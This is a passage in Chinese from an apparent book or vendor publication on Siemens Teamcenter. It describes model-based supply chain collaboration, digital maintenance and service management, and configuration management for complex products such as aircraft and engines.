Test.Lab为确保仿真的效率及精度提供了重要的支持。 第16章 基于模型的MBE供应链管理 16.1 业务挑战 在竞争日益激烈和经济全球化的时代,竞争主体逐步从实体企业过渡到涵盖以OEM厂商为代表的整个供应链和价值链的扩展企业。在这样的扩展企业中,各种供应商发挥着非常重要的作用。例如,在波音787的研制过程中,70%的零部件是来自遍布全球各个角落的供应商。扩展企业面临的挑战是,如何更加高效地整合全球供应商的智力与物理资产,并进行各种创新,缩短产品研发与上市时间,交付高质量产品与服务,并有效降低成本。 为了有效解决上述挑战,以波音为首的几个OEM厂商经过多年尝试与验证,证明利用基于模型的MBE供应链管理是行之有效的方式。美国陆军研究院指出,“如果恰当地构建MBE的能力体系,能够有效地减少50%~70%的非重复成本,缩短达50%的上市时间”。美国国防部办公厅明确指出,将在其所有供应链中的各企业里推行MBE,并开展MBE能力等级认证。 “扩展企业内信息的协同与数据交换”是MBE企业能力等级评价体系中六项指标之一。只有满足了该指标,才能达到MBE能力等级的第五级,才能称之为真正意义上的MBE企业。 16.2 解决方案 西门子基于模型的MBE供应链管理需要考虑供应商角色与定位、方案组合、多站点协同、基于全球化组织与工作流的协同、基于公文包的供应关系管理和社区协同六个方面,针对具体企业的实际环境提供最佳供应链管理模型。 1.供应商角色与定位 OEM与供应商之间的协同关系可以根据供应商的数量和集成深度分成高、中和低三个等级。由于不同角色供应商的责任不同,其与OEM之间的业务紧密程度也不同,因而在OEM的整个供应链管理环节中,对集成协同的要求也不尽相同。 在扩展企业复杂的供应链关系中,OEM厂商是中心,其他各种供应商相对于OEM来说,具备以下不同的角色: ·合约员工:作为OEM产品研发小组的成员,直接在OEM内部环境工作。 ·系统集成商:负责整体产品的研发与制造,具有与OEM相当的能力与责任,与OEM共担风险与利益。 ·系统供应商(设计或制造):负责系统特定功能的研发与制造,在该功能系统中的零件可能分布在产品的不同位置,确保该功能系统与整个产品的兼容性;与OEM共担风险与利益。 ·子系统或组件供应商(设计或制造):负责特定组件的研发与制造,较少参与OEM的研发流程。 ·标准件或根据规格制造的供应商:交付标准件或根据OEM的规格进行制造,几乎不参与OEM的研发流程。 从合约员工到标准件或根据规格制造的供应商,供应商的数量依次增多,但其集成协同的等级依次降低,如图16-1所示。 图16-1 供应商的角色界定 2.方案组合(协同组合模型) 每一个OEM厂商都会面临与各种不同的供应商进行集成协同与数据交互的要求,不可能用一种简单唯一的方式来满足。西门子Teamcenter平台提供了一套灵活而成熟的供应链管理解决方案组合,能帮助OEM快速建立完整的供应链管理解决方案,而不需要复杂的集成定制,极大限度地降低供应商的投入。 Teamcenter平台能提供的4种协同集成模式是:嵌入式、同步式、异步自助式和异步赞同式。针对不同的供应商可以依据与OEM厂商在流程参与度、数据交互的频度与数量、虚拟协同的程度(决策、会议)等,选择适合自己的方式。 ·嵌入式:供应商直接在OEM的Teamcenter环境中,遵照OEM的MBE业务流程,利用Teamcenter强大的MBD/MBM(Model Based Definition/Model Based Manufacturing,MBD/MBM)管理能力,直接集成各种CAD来开展基于模型的产品定义、产品制造以及产品服务等方面的业务工作。Teamcenter的全球化部署与访问能力可确保分布在全球的供应商直接使用OEM的Teamcenter环境。 ·同步协同:供应商在自己的Teamcenter和CAD系统中按MBE流程与方式开展工作;可通过多站点协同能力实现自己内部Teamcenter系统与OEM的Teamcenter系统采用推式或拉式进行MBD/MBM等数据交互,且实现自动同步;在OEM厂商的Teamcenter系统中建立对应的用户,通过远程邮箱或OEM Teamcenter Web客户端,参与OEM的业务流程。 ·异步协同(自助式):供应商在自己的PLM和CAD系统中按MBE流程与方式开展工作;在OEM厂商的Teamcenter系统中建立了用户(相当于有一只眼睛),可基于角色查询或获取数据,通过OEM Teamcenter Web客户端参与OEM的业务流程;可采用公文包(Briefcase)格式进行各种MBD/MBM数据交互。 ·异步协同(赞助式):在自己的PLM和CAD系统中按MBE流程与方式开展工作;在OEM的Teamcenter SRM(供应关系管理系统)中进行基于事务的数据访问与业务处理,也可采用公文包格式进行各种MBD/MBM数据交互。 在异步协同方式中,不要求供应商是Teamcenter系统。如果供应商采用Teamcenter系统,其可利用公文包把数据结构化导入到自己的Teamcenter系统中,也可轻松创建新的公文包传递数据给OEM厂商。 3.多站点协同 西门子Teamcenter多站点(Multi-site)协同技术可实现基于对象的信息交换,实现MBD/MBM类数据以完全相同的模式在不同站点中显示,能够控制同一对象在协同网络中的地位和权限,并且自动处理数据交换与同步过程中的冲突识别。 ·ODS服务:ODS服务不但允许对象发布和检索(对象一旦发布,就可以被其他站点查询),还可以只对某些远程站点开放。对象发布的操作受Teamcenter权限管理控制,IDSM服务用于对象的远程导入和同步。 ·主对象与副本:在Multi-site网络中,对于同一对象,有且只有一个主对象,其他都为副本。只有主对象才可以被修改,副本不能被修改。主对象被修改后,通过同步机制来更新网络中所有的对象副本。同步机制可以有即时同步,也有定期同步。即时同步方式对网络压力较大,一般采用每天定时同步。副本不能被发布到ODS,也不能再次被导出。对象的主对象或者副本之间的地位可以变化,即可以通过所有权站点传入/传出来改变对象的地位。 ·对象的导入/导出:对象的导入可以设置为只对某些站点开放。对象的导入/导出操作受导出站点和导入站点Teamcenter的权限控制。对象所有权的传入/传出也同样受导出站点和导入站点Teamcenter的权限控制。远程导入是一种主动式的信息获取,Multi-site提供了另外一种被动式的数据获取方式,即由数据的拥有站点将数据直接推送到远程站点。 ·远程通知:针对局部修改或者小数据量的修改,提供了远程签入/签出(Remote CheckIn/CheckOut)的方式,减少了网络上传输的数据量。通过远程邮箱(Remote inbox),可以实现站点之间流程信息的通知机制,确保参与异地站点流程的人员及时处理业务。 ·数据模型:每个Teamcenter站点之间需要共享的对象类型的数据模型要保持一致,对于非共享对象类型,可以各自定义,这样每个站点可以拥有各自特有的数据模型、流程模型和业务模型,以支持自治的业务。 Multi-site部署方式灵活,主要包括点对点架构、主站点架构、Hub架构以及Proxy架构等。根据不同的需求可以在确保网络安全情况下协同不同架构模式(见图16-2): ·全球网格模式:点对点的模式,适用于各平等的企业之间进行较强的业务交互,但各自的业务与流程不同。 ·全球主站点模式:适用于总部式或业务总控制模式,各站点有自己相对独立的业务与流程。 ·全球单一站点模式:扩展企业的所有机构、人员至单一的全球化部署的PLM平台中工作。适用于网络条件(带宽、稳定性、安全性)具备且业务紧密度高、流程有较强的一致性要求的企业。 对于OEM厂商,可以根据自己各下属机构、系统集成商、合约用户等的网络、业务情况选择这三种模式之一或组合。对于各种供应商,如果需要与OEM厂商有比较紧密的数据与流程的关系,也可采用这三种模式之一以融入到OEM厂商组建的扩展企业中。 图16-2 Multi-site的三种典型部署方式 西门子Teamcenter的多站点协同技术具有以下特点: ·多主体性:扩展企业的研制活动,使活动由两个或两个以上的企业参与,而这些企业通常是相互独立的,并且具有各自的领域知识、经验和一定的问题求解能力。 ·分布性:参与企业的位置具有广泛的分布性,企业之间的信息交互是通过网络、服务器等现代通信技术来实现的。 ·协同性:具有至少一种协同机制,包括各扩展企业间的通信协议、通信结构、冲突检测和仲裁解决等机制。 ·共同性:多企业要实现的目标是共同的,所在的研制环境和上下游的信息也要保持一致。 ·灵活性:参与企业的数目可以动态地增加或减少,协同的体系结构具有灵活性和可变性。 4.基于全球化组织与工作流的协同(见图16-3) 为了更好地支撑企业全球化的全面协同工作,西门子PLM更加深化了Multi-site技术,并将在后续Teamcenter版本中逐步推出和完善全球化组织(Global Organization)与工作流(Global Workflow)方面的功能。 图16-3 基于全球化组织与工作流的协同 在全球化组织管理机制下,每个用户或工作组有自己的主站点,可根据需要向其他站点进行同步推送,相应的其他站点就拥有该用户或工作组的副本。这将极大简化全球化团队的管理流程,同时为全球化工作流提供组织基础。 全球化工作流的功能机制主要实现工作流模板和工作流实例的跨站点。某一主站点定义的工作流模板可向全球其他站点进行同步推送和更新控制,确保全球化公司流程的统一性控制;基于全球化工作流模板和全球化组织,就可实现工作流实例的跨站点执行,即系统自动实现工作流任务。 流程执行者可以像执行本地流程一样实现信息跨站点通知和目标对象的跨站点推送。 5.基于公文包的供应关系管理 西门子Teamcenter的供应关系管理系统(SRM)提供了基于Web的供应关系管理解决方案,能有效支撑OEM厂商与供应商之间RFx(Request for X)业务的优化执行。Teamcenter供应关系管理具有以下几个方面的能力: ·采购寻源(Sourcing Survey):Teamcenter供应关系管理采用基于网络的解决方案取代传统的基于RFx和采购寻源的重复过程,简化了数据收集和分析的过程,并使之标准化。不管是用于发布RFI、RFP、RFQ,还是市场调查,都能够从多个供应商处获取关键的采购信息、建议和报价,也可以获取供应商的相关定价数据,在产品开发和采购团队之间实现协同。 ·在线谈判:利用Teamcenter SRM的网络谈判(Internet Negotiations)能力,可以实现下行和上行拍卖活动,不管采购的是何种货物或服务,采购团队都可以在网络上完成整个谈判过程。在线拍卖是整个采购战略中一个极具价值的组成部分,它提供了价格透明度和分析功能,并且该功能可以被升级、扩展到全球各地的供应商中,从而大幅缩短采购周期,节约成本,帮助企业做出更好、更合理的采购决策。 ·支出管理:利用Teamcenter SRM,采购人员可以把企业现有系统的数据合并到共用的支出类别及适当的公司层次中,从而理解公司到底是如何真正进行采购的。支出管理可以提供高度可信的全组织支出数据,这是朝实现有效分析和采购这一目标迈出的至关重要的第一步,也可改善支出跟踪,识别采购机会,快速执行采购项目,增加谈判筹码,实现通过谈判节约成本。 ·供应商管理:Teamcenter SRM可以对供应商进行识别、聘用和评估,包括让供应商自己注册。采购团队可以访问那些在决策过程中起着至关重要的供应商信息。在自行登记和记录维护过程中,供应商提供采购团队需要的信息,这些信息的范围很广,从联系人和总体财务情况到具体的产能/生产能力信息。可以根据多维信息搜索供应商数据,包括客户专用的采购树。该解决方案还提供了供应商评估、状态设置以及监控功能。 ·与研发平台集成:Teamcenter SRM允许在RFP里面加入物料清单,从而提高采购的准确性,同时缩短新产品的上市周期。它与优化显示工具结合之后,RFx可以提供场景建模,用于解决先期采购模拟问题。决策分析可以围绕多重供应制约因素和供应模型进行,这样采购人员和采购团队就可以从烦琐的行政管理事务中解脱出来,把更多的时间花在谈判和重要的战略问题上。 尤其在RFx业务中,公文包以及公文包浏览器(Briefcase browser)技术为MBD/MBM数据交互提供了高效经济的手段。 ·公文包:公文包是一结构化的数据包,包括原数据(XML)、NX类MBD模型、MBM数据、JT,以及各种文档数据等。 ·生成公文包:Teamcenter可选定特定对象或BOM结构,快速产生生成公文包;修改后的公文包也可快速导入Teamcenter系统。 ·公文包内容:公文包内容可以是制造规格书、询价单、征求方案建议书、方案建议书、技术协议等。 ·公文包浏览器:供应商可通过独立的公文包浏览器结构化查看、编辑、比较数据。对于特定格式的MBD/MBM数据,可打开相应的CAD/CAM/CAE软件进行查看和更新。 通过公文包方式,OEM厂商为供应商提供了一种廉价的信息交互方式。即使供应商没有Teamcenter系统,也能够有效实现结构化数据包对接交互。 6.社区协同 Teamcenter社区协同(Community collaboration)提供了完整的扩展企业内广泛协同的框架,产品生命周期过程中的参与者可以利用虚拟社区、网络会议和交流论坛等方式对产品、生产制造、服务等PLM信息进行交流,消除不同功能部门或企业之间的障碍。 ·产品生命周期协同:产品生命周期协同构建于微软的Sharepoint之上,利用安全社区工作空间的方式,从Teamcenter系统查询、检索必要的数据(包括各种零组件对象、MBD模型和JT文件等),同时向Teamcenter系统提交相应的数据(问题报告、会议记录等),并促发更改业务流程等。 ·问题管理:通过基于NX与Teamcenter Visualization的实时协同,利用桌面共享和网络会议管理等方式进行深入广泛的问题管理,实现安全、实时、分布式的团队协同;实时协同对MBD/MBM数据类型更加高效,还支持创建wikis、blogs、RSS、论坛等。 扩展企业可灵活应用上述的能力框架,实现与供应商协同业务的紧密结合。 Teamcenter社区协同能安全共享产品全生命周期的所有信息,使扩展企业中的所有参与者能够协同工作。通过全球协同沟通的模式,消除工作团队之间时间、距离与文化差异,更高效地促进产品研制,优化供应链,共享利润空间。 16.3 价值体现 西门子基于模型的MBE供应链管理解决方案在优化MBE流程的过程中,构建全球供应链的集成协同与数据交互架构,从而能够: ·有效实现面向新供应商的全球化采购。 ·快速构建灵活的供应商协同与交互能力。 ·有效减少企业管理成本。 ·有效保护企业的智力资产。 ·支撑广泛供应链内的闭环MBE流程。 ·构建企业一致和可扩展的供应商集成方法。 总之,西门子基于模型的MBE供应链管理解决方案不仅帮助MBE企业快速构建供应链全面集成协同与数据交互,同时消除供应链管理中的非增值活动。 第17章 基于模型的MBE数字化服务管理 17.1 业务挑战 根据国际研究机构AMR的调查研究结果显示:“高效的产品服务保障为企业带来40%~80%的利润……对于有复杂装备的产品服务,其产值可达到产品价值的2~5倍……”。因此在复杂产品使用企业日益增加产品维护、维修服务投入的同时,复杂产品原厂商OEM也充分利用其技术与知识的优势为客户提供优质的产品服务,获取更大产值与利润。 无论使用复杂产品的企业与OEM厂商,都在致力于优化服务资源与流程,实现实物产品技术状态与履历以及服务知识的管理,来提高产品维护、维修的效率与质量。对于OEM厂商,面临的更大挑战是:如何充分、综合利用企业跨设计、制造、服务部门的技术与知识,来提供优质服务,同时形成设计、制造、服务相互促进的局面;使其提供的产品服务优异于专业服务公司或产品使用企业自身,使产品使用企业更愿意购买OEM厂商的直接服务。对于走上MBE之路的OEM厂商,MBD模型成为跨部门知识的主要载体,因而在整个产品服务周期内如何充分利用MBD模型为产品服务提供助力,也是非常值得关注的主题。 17.2 解决方案 1.数字化服务解决方案的完整能力 数字化服务解决方案(西门子Teamcenter MRO)可建立完整的产品服务工程、维护、维修和大修的功能,从而满足产品服务生命周期管理和企业实物产品管理的需求。尤其对于复杂产品,数字化服务解决方案使产品的整个生命周期的各环节完全可视化,可以使用配置驱动的产品服务的能力来规划服务运作,优化服务执行,并更好地利用实物产品与零件、工具和设备库存,最大限度地提高服务部门的效率: ·服务数据管理:可以使企业透明化,了解复杂长寿命实物产品(包括实物构型和技术状态),并且可以有效收集服务活动,更新实物产品的即时状态,包括实物产品的维修在役状态、更换件情况、时间寿命、备件/串件历史等,实现基于批次或序列号的追溯。通过完整电子履历或卷宗的记录,提升下次服务的准确性与高效性,进而支持PBL(基于绩效的后勤)/SLA(服务等级协议)合同模式。 ·服务知识管理:实现以故障码为表述的服务知识管理,每个故障码可管理相应的故障现象、故障解决办法、解决故障的资源和人员需求、成本等。建立可动态积累的故障库,实现对故障库的有效管理和查询利用。同时可以为每个产品定义相应的故障树,定义故障发生的频率和条件,实现可预测的服务计划。 ·服务需求管理:根据系统工程思想,在进行产品设计时,可同步开展产品服务的工程工作,根据客户需求和产品特点,分解定义产品,甚至是每个部件的服务需求。通过服务需求管理与共享,为产品设计人员提供设计参考,也为产品服务的提升打下基础。 ·服务请求管理:可帮助企业有效地管理服务请求,通过流程的方式,完整记录和管理整个服务请求的闭环过程。从而加快响应速度,提高客户满意度,同时控制成本和维护标准。 ·服务规划:企业可以创建、管理和利用服务规划信息,以支持旨在预防、基于条件或可靠性的维护模型;同时创建与管理IETM(交互式电子技术手册),支持高效的产品服务以及服务培训。 ·服务计划和执行。企业可以有效地制定服务作业和任务计划,并跟踪从执行工作到完工和签字确认的整个过程,以收集重要的资产信息,改进服务计划和未来的产品。 ·报告和分析:企业可以查看服务中的运营信息,以找出实物产品的绩效性/可靠性方面的发展趋势,跟踪/分析资产和组织的关键绩效指标(KPI)。 对于MBE企业,除了上述基本通用能力外,基于MBE模型的数字化服务解决方案为MBE企业提供交互式电子技术手册、实物可视化展现与分析、维护维修的仿真分析以及技术资料到现场等针对性、专业性的能力。 2.面向MBE的交互式电子技术手册/技术出版物 基于MBE的数字化服务解决方案为MBE企业提供产品服务所需要的IETM创建、有效性管理以及多语言翻译管理的全套能力: ·IETM的创建:企业可以采用结构化的技术手册的方式,定义其内容与产品设计、制造的MBD模型或技术内容的关联关系,实现直接利用与同步更新;可支持企业配置定义技术手册的输出样式;同时结合三维图册制作工具(例如:西门子的Cortona 3D)提供强大的基于MBD模型的三维内容创建能力,包括装配组织、爆炸图、仿真动画、热点管理等,能够满足维护操作手册、产品目录、培训材料等各种不同的业务需求。 ·IETM的内容管理和发布管理:对结构化的技术手册内容、输出的完整技术手册进行更改审批流程与版本有效性的控制。 ·IETM的多语言翻译管理:为企业提供不限数量的多语言翻译管理能力;维护源主题与翻译主题的关联;翻译内容可以是文档的最小组成单位,关联关系也可细致到文档的最小组成单位。 3.面向MBE的实物可视化展现与分析 基于MBE的数字化服务解决方案为MBE企业提供多种实物的可视化展现以及分析的能力: ·实物产品可视化展现:在对实物产品的技术状态管理中,通过DMU模型的三维可视化能力,可实现实物零组件在数字化MBD中产品位置的查找与显示,以及基于数字化MBD产品查找追踪实物BOM上的实物零组件。 ·基于可视化3D模型的分析:对于综合保障的六性分析(可靠性、维修性、保障性、测试性、安全性、环境适应性)结果报表,可基于轻量化的数字化MBD产品进行立体式的全方位展示。 ·基于个性化主动式工作空间的分析:利用个性化主动式工作空间(见图17-1)的数字化MBD产品展现与搜索能力,进行服务质量或技术问题的关联分析,找出最佳的排故方案,以及验证排故方案能否满足产品使用需求等。 4.面向MBE的维护维修虚拟仿真 基于MBE的数字化服务解决方案可充分利用数字化制造解决方案的虚拟仿真能力,为MBE企业提供强大的维护维修的虚拟仿真能力: ·维护维修过程仿真:全三维发动机数字化维护维修仿真提供了一个虚拟的制造环境来验证和评价维护维修过程、方法。研究维修拆装的可达性,即零/部件是否能装得上。拆装流程的优化,即零件拆装的顺序和工序的合理安排。拆装工装的验证,验证工装的正确性,维修工作的可操作性。 图17-1 主动式工作空间 ·维护维修的人因仿真:能帮助企业详细评估人体在特定工作环境下的一些行为表现,如动作的时间评估、工作姿态好坏的评估、疲劳强度的评估等。可快速地分析人体可触及范围、人体视野,从而来分析维修时人体的可操作性和维修操作的可达性。还可以分析人体最大或最佳的触手工作范围,帮助改善工位设计。系统提供多种人体建模模型标准,以及全面的人因评价标准,具有完善的评价体系和更为柔性的动作仿真功能。 维护维修的仿真分析示意如图17-2所示。 5.面向MBE的技术数据包(TDP)到维护现场 基于MBE的数字化服务解决方案可充分利用Web客户端与移动(基于iPad等移动设备)能力,把产品服务所需的技术数据包或IETM快捷延伸到维护现场,使现场服务人员可采用灵活的方式查阅维修用的操作指南、设计资料以及各种必要的交互式电子手册,同时可把现场维修的事件、实物的实际状态等返填到MRO系统,提高服务人员的服务效率与质量。 图17-2 维护维修的仿真分析示意 基于iPad的技术数据包访问情景如图17-3所示。 图17-3 基于iPad的技术数据包访问情景 17.3 价值体现 数字化维护服务解决方案(见图17-4)以面向产品全生命周期的视角,通过有效闭环连接产品规划、产品设计、产品制造与产品服务的业务环境,不仅提高了产品服务的质量、效率和服务知识,同时通过服务反馈来提升产品规划、设计、制造的质量。 图17-4 面向全生命周期的数字化维护服务解决方案 总之数字化维护服务解决方案关注整个产品的服务生命周期,可以为企业(产品使用企业与产品OEM企业)带来如下收益: ·使服务组织能够更高效地规划和交付产品服务。 ·最大限度地提高所管理的实物产品的可用性和可靠性。 ·为服务团队提供资产知识,以便他们了解服务要求。 ·形成反馈闭环,以使产品开发人员清楚客户所关心的问题。 ·支持旨在预防、基于条件或可靠性的维护操作。 ·是MBE企业使MBD模型以及相关信息最大限度地应用到产品服务的过程。 第18章 复杂产品的构型管理解决方案 18.1 构型管理概述 18.1.1 构型管理的发展史 构型管理(Configuration Management,CM)起源于20世纪60年代美国空军采办政策的需要。当时美国空军使用军用构型管理控制新飞机的研制过程获得了成功,于是,1962年美国空军提出历史上第一个构型管理的标准,即AFSCM375-I《研制和采购阶段的构型管理》;之后,美国军方与国防部相继制定了MIL-STD-480《构型控制-工程更改、偏离和超差》、MIL-STD-481《构型控制-工程更改(简要形式)》、MIL-STD-482《技术状态状况纪实、数据元素及相关特性》、MIL-STD-482《系统、设备、军需品和计算机程序的构型管理》等;为了统一这些分散的标准,美国国防部于1992年4月颁布了MIL-STD-973《构型管理》标准。随后军品的构型管理标准逐步扩展到民品,并实现了统一:1998年7月,ANSI发布了构型管理的国家标准EIA-649;2000年9月30日,美国国防部中止了MIL-STD-973标准的使用,用EIA-649民用标准取代;2001年,美国国防部发布了MIL-HDBK-61A(SE)《军用手册构型管理指南》,作为一个指导性的手册,该指南指导政府的采办工作;2004/2005年,ANSI陆续发布了构型管理规范的新版本ANSI/EIA-649A-2004/2005;2011年ANSI更新发布了标准ANSI/EIA-649B-2011。总之构型管理逐步发展成为一门十分重要的学科,广泛应用于新产品的研制与管理,从军方的“强制要求”变为企业的“自觉行为”,并为政府与工业界所共同承认:有效运用构型管理的原理,可以使投资效益最大化、使产品生命周期成本降低。 18.1.2 构型管理的名词和性质 构型(Configuration):是构型项在研制过程中,正式规定的并在产品实际使用过程中体现客户要求的功能特性和物理特性的完整表示。构型项(Configuration ITEM):是一些被选定的系统硬件或软件(或硬件与软件的组合)项目,被政府或采办活动用来接受构型管理的独立对象。构型管理是一种面向产品全生命周期的,以产品结构为组织方式,集成和协调与产品构造过程相关的一切活动与产品数据,保证产品生命周期阶段的零件、文档和更改数据的一致性和可控性,提供产品构型的可视化定义和控制的产品数据管理技术。 ANSI/EIA-649B-2011将构型管理归纳为5个功能和37个原则,缺少其中任何一个功能都不能构成真正的构型管理系统。同时在政府采办产品构型管理的顶层功能模型中,项目需求与系统工程中的需求是构型管理的关键输入。 构型管理也称为配置管理或技术状态管理。不同领域采用不同的叫法,配置管理一般应用在普通民用产品领域内;技术状态管理或构型管理则一般应用于航天和航空领域中。其中技术状态管理是我国在军备方面一直采用的概念,而构型管理则是当前飞机制造领域中所普遍采用的概念,其在管理的范围、功能和内涵上都有扩展。 18.1.3 构型管理与其他系统的管理 构型管理与其他相关系统具备紧密的关系: ·构型管理系统与设计系统之间的数据交换只限于构型文件(基线数据),构型管理不必管那些不成熟、带有低级设计错误的设计文件,因为它们没有达到构型文件的标准。构型管理把设计系统的工程空间、客户空间与验证空间集成起来。 ·构型管理是系统工程的重要组成部分。在系统工程中构型管理属于控制机制。 ·构型管理置身于项目环境中,项目管理是构型管理的驱动力与源头。 ·构型管理是现在质量管理体系中的一部分(例如:ISO 1007:1995质量管理构型管理指南)。 ·构型管理过程是初始的试航或认证过程。FAA Order 1800.66文件中明确规定了构型管理的要求,详细说明了执行构型管理的过程与程序。 18.1.4 构型管理的研究主题 目前国内外针对构型管理主要有两个方面的课题: ·一个方面是从客户的角度出发进行产品的配置设计,针对客户个性化需求进行设计。在已有产品模型的基础上,充分利用现有的设计资源,对已有的资源进行配置或者局部修改,以配置器为主要工具,进行快速的产品配置,从而支持产品创新,满足产品多样化需求。 ·另一方面是从构型管理过程角度出发,对产品研制的全生命周期的产品数据、生产制造和变更过程进行控制,从而保证产品数据的一致性和可追踪控制,保障最终产品能够满足客户的需求。 西门子一直致力于管理产品全生命周期,在构型管理的这两个方面都提供有效的解决方案,并将持续优化。 18.2 解决方案:业务流程和构型管理方法 18.2.1 构型管理业务组成 按照构型管理实践的要求,从构型管理业务流程的角度来看,构型管理主要由以下五个部分组成,如图18-1所示。 图18-1 构型管理的组成部分 1)产品结构管理。 2)有效性管理。 3)转阶段与基线管理。 4)工程更改管理。 5)标识与签署管理。 其中,产品结构的建立是构型管理的核心。有效性管理、基线管理、更改管理、标识管理等都是围绕着产品结构中的元素来进行的。下面,以产品结构的建立为主线,论述有效性、基线、工程更改等方面的管理。 18.2.2 产品结构的建立和层级的划分 复杂产品的结构(以发动机为例)一般分为三层:顶层、配置层、底层(见图18-2)。 图18-2 复杂产品的结构层次 顶层:顶层用来组织、建立、管理复杂产品的结构,通过顶层结构的分类,可以迅速导航、查阅到底层的零组件。这一层结构基本不变,是虚的节点,主要用于管理功能。 一般来说,在设计阶段,顶层产品结构主要按照专业来进行划分,用来在设计阶段进行各个专业的设计工作。在民用、军用飞机产品设计过程中,顶层产品结构一般按照美国航空运输协会(Air Transport Association Of American)所发布的ATA 2200来进行分解,全世界民用飞机的信息编码均执行ATA 2200的规定。而军用飞机也有类似的标准和规定,例如MIL-STD-1808A。 配置层:是构型管理的主要层级,通过可配置构型项的建立,来实现产品的有效性管理和变更控制。对于顶层来说,这一层级的构型项构成了顶层产品结构管理的管理节点;对于底层来说,它向下挂接了技术方案,也就是产品的装配和零件,管理着零组件(三维模型和图纸)。 底层:是构型项挂接的技术方案的节点,主要由各种模型和图纸组成。这一层主要为工程管理层,工程师完成的设计模型和图纸在这一层通过构型项来进行统一管理。 18.2.3 产品结构的设计原则 产品结构是共享的、产品相关业务和技术数据的、组织化的收集。它是复杂产品的分解,支持变更流程、数据交换流程、追踪流程。产品结构提供专业的视图,回答其需求并支持其活动。产品结构是围绕统一的项目WBS组织的、技术和业务数据关联的描述。产品结构提供访问3D模型、文件的导航。 产品结构增强了高度复杂产品的管理,它增强了所有产品相关业务流程的透明性和灵活性。在型号、工程、制造、支持方面,产品结构的正确实施会增强产品成本和效益管理。通过对衍生的扩展、重用,产品结构是并行工程流程成功的基础条件。 产品结构设计的原则是: ·设计方式:变化最少。 ·组织方式:将可变部分、不变部分分开。 ·链接方式:分三个层级,顶层、配置层、底层,每个层级分不同的子层级。 18.2.4 构型项的定义 在复杂产品构型管理过程中,需要进行构型标识的工作,这类工作主要通过产品结构和构型项的定义来完成。可以这样说,构型项的定义和管理是产品结构管理工作的核心。 因为产品的复杂性,不可能用一个实体来进行构型管理,所以要将产品分解成更小的元素,例如:大部件、工作包、组件装配等,这些元素就称为构型项(Configuration Item,CI),我们用分解的流程来选择CI。CI就是复杂产品结构中最重要的组成部分,它承载了大量信息,来管理批次、架次、台份、变更等信息,甚至承载了项目管理、人员组织结构等方面的信息。CI是典型的模块化设计方式,完全符合基于模型的系统工程思想。 EIA-649B关于CI定义的要点如下: CI是一个产品或一个复杂产品结构中的主要组件,为最终产品提供重要的功能。 CI的指定过程是把需求规范分解到项目,从而进行分别研制的一种实用方法。所指定的CI可标注其组件的变更有效性。 CI受到构型管理的特别关注,它们通常是系列化的,并承受设计评审和构型审核。 CI的确定主要在产品需求的分析和分解中进行,以形成最初的产品结构。 CI的指定与供应链中的位置有关。一般常把供应商的最高层、最终产品作为CI。 CI的数量多少与产品的复杂程度有关,也与系统集成度有关。CI不能选择太多,否则会影响构型管理的清晰度,使构型管理变得非常琐碎复杂,抓不住要领,并且增加管理成本。例如,假设我们把每一个零件都作为一个CI,那么就意味着我们会有大量的变更流程,而每个变更流程都有管理成本,所以多个CI就意味着管理成本的大大增加;CI也不能选择太少,太少则缺少向下层的有效分解,不利于对子系统的构型管理的进一步深化,例如,假设我们只把发动机定义成一个CI,那么大量的变更流程体现在一个发动机的CI上,发动机CI的版本就会变得极其混乱。 18.2.5 有效性和构型管理 在构型管理过程中,产品零部件管理的有效性是通过两个层级来管理的,顶层产品结构通过对CI的选配,用CI来管理配置(批次的管理);配置层的DS(设计方案)用来管理有效性(台份的管理),如图18-3所示。 图18-3 产品零部件的管理 配置:产品配置用来在产品规划设计阶段定义产品顶层结构,定义产品选配并创建针对于指定产品配置的产品BOM结构。对于不同的产品选配都有一个产品配置与之对应,而任何一个产品BOM结构都有唯一的一个产品配置与其对应,以保证产品BOM结构的产品配置有效。简而言之,复杂产品的批次最终是通过对CI的选配来完成的。 有效性:台份的有效性在配置层定义。通过不同台份的不同DS来实现针对不同台份的有效性。简而言之,复杂产品的台份最终是通过对DS的有效性过滤来完成的。 18.2.6 变更管理 对于产品的变更管理,变更的决策根据两方面考虑:首先,变更是否是必需的,如果是必需的,它的可行性如何;其次,对于变更打开的原因,怎样、何时来体现,怎样考虑成本。 对于产品的变更,要考虑安全、性能、功能、可靠性、维护、重量、互换性或备件、基本的发动机的标准规范、客户的技术定义、设备规格、最初选定的供应商、生产及其他成本、生产延误等变更控制的标准。 在构型变更中,变更的原则是:影响3F原则的零件直接换号,不影响3F原则的零件直接升版。其中3F原则是装配、外形、功能(Fit、Form、Function)的缩写。 1)对于换号: 变更影响到了装配约束,对所变更的模块进行换号; 变更导致新的规格,对所有变更模块进行换号; 在模块中增加了新的零部件,对模块进行换号; 变更了模块的材料,导致制造工艺发生变化的,一律换号处理。 2)对于升版: 变更只在模块内部进行,不影响与其他模块的装配约束关系,则只升版。 18.2.7 产品结构的演变 复杂产品的定义应该从客户的需求开始,一直到设计、生产、交付、维护、服务等,贯穿各个阶段,在产品发展的不同阶段,要建设不同形式的BOM,以满足整个产品设计过程的需要。在产品的不同阶段,产品BOM应该有不同的表现形式(见图18-4),并且这些不同形式的BOM之间具有非常紧密的关联性和演变性。 需求BOM是设计BOM建立的基础;工程EBOM的顶层产品结构与设计BOM相同,而底层管理的设计模型和图纸过转阶段的方式进行成熟度演变;工艺、装配BOM搭建了从设计到制造的桥梁,通过构型管理的“单一管理”原则保持底层设计方案模型不变;制造BOM通过台份过滤,从而得出实物BOM的视图;实物BOM加上保障性设计信息,以及零组件拆装、修理等维护信息演变成为维护BOM。 图18-4 产品BOM的演变 无论是设计数据、装配数据、台份数据,还是服务数据等所有复杂产品相关的工程数据都是和各阶段BOM紧密关联在一起的。只要找到了零件或者BOM就能查找到所有相关的各类制造数据,反过来也可以通过一个制造数据找到相关的虚拟或实物零件和BOM。因此,复杂产品制造数据的历史追溯能力基本上也就体现在不同阶段复杂产品BOM的追溯能力上。 18.3 解决方案:构型在Teamcenter系统中的实现 Teamcenter(TC)作为全球领先的产品全生命周期管理平台,为复杂产品的构型管理提供了坚实的平台基础和具体的解决方案。 ·TC提供业界最全的产品全生命周期平台,支撑全生命周期的业务活动,管理全生命周期的数据,是构型标识的有效工具,也是构型状态纪实的良好容器,更是构型管理计划编制及管理的有效平台。 ·TC提供最佳的产品配置器,全面支撑如飞机、发动机等复杂产品的基于配置项、批架次或台份等构型管控机制,同时实现从需求BOM、工程BOM、工艺BOM、实做BOM和维护BOM的全生命周期BOM管理,是构型状态纪实的有效工具。 